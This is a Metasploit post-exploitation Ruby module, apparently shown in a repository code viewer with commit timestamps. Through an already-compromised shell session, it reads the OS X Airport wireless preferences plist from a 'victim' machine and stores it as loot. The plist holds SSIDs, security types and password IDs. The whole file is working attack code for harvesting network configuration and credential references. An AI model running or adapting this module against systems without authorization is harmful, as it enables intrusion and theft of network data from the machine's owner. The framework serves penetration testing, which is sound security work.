metasploit-framework/modules/post/osx/gather/enum_airport.rb

81 lines
1.9 KiB
Ruby
Raw Normal View History

2012-03-27 06:18:38 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/post/common'
class Metasploit3 < Msf::Post
include Msf::Post::Common
def initialize(info={})
super(update_info(info,
2012-08-14 20:29:21 +00:00
'Name' => 'OS X Gather Airport Wireless Preferences',
2012-03-27 06:18:38 +00:00
'Description' => %q{
2012-08-14 20:29:21 +00:00
This module will download OS X Airport Wireless preferences from the victim
2012-03-27 06:18:38 +00:00
machine. The preferences file (which is a plist) contains information such as:
SSID, Channels, Security Type, Password ID, etc.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
'Platform' => [ 'osx' ],
'SessionTypes' => [ "shell" ]
))
end
def exec(cmd)
tries = 0
2012-03-27 06:18:38 +00:00
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
2012-03-27 06:18:38 +00:00
rescue EOFError => e
tries += 1
if tries < 3
vprint_error("#{@peer} - #{e.message} - retrying...")
retry
end
2012-03-27 06:18:38 +00:00
end
end
def get_air_preferences
pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist")
return pref =~ /No such file or directory/ ? nil : pref
end
def save(data)
p = store_loot(
"apple.airport.preferences",
"plain/text",
session,
data,
"com.apple.airport.preferences.plist")
print_good("#{@peer} - plist saved in #{p}")
end
def run
@peer = "#{session.session_host}:#{session.session_port}"
# Download the plist. If not found (nil), then bail
pref = get_air_preferences
if pref.nil?
print_error("#{@peer} - Unable to find airport preferences")
return
end
# Save the raw version of the plist
save(pref)
end
end